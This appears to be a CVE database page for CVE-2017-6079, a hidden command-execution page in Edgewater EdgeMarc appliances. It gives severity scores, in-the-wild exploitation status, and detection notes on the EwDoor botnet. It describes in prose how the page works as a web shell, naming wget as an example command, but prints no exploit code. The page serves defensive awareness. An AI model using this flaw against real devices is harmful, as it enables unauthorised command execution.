cbcvebase.
CVE-2017-6079
published 2017-05-16

CVE-2017-6079: The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows for user-defined commands such as specific iptables…

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
46.85%
98.7th percentile
The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows for user-defined commands such as specific iptables routes, etc., to be set. You can use this page as a web shell essentially to execute commands, though you get no feedback client-side from the web application: if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006.

Detection & IOCsextracted from sources · hover to see the quote

  • CVE-2017-6079 is exploited via a hidden web management page on Edgewater Networks Edgemarc appliances that allows arbitrary OS command execution (e.g., wget) with no client-side feedback; monitor HTTP requests to undocumented/hidden management pages on EdgeMarc devices for unexpected command parameters.
  • The EwDoor botnet exploits CVE-2017-6079 exclusively against EdgeMarc Enterprise Session Border Controller devices on AT&T carrier networks; detection should focus on anomalous outbound connections and C2 beaconing from these specific device types.
  • ·The hidden command-execution page vulnerability has been present in EdgeMarc firmware as far back as 2006, meaning a very wide range of firmware versions across many device generations may be affected.
  • ·Early EwDoor botnet samples contacted a non-existent C2 server (later registered by researchers), so C2 infrastructure indicators from early samples may no longer be valid; cybercriminals subsequently severed communication with that server.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.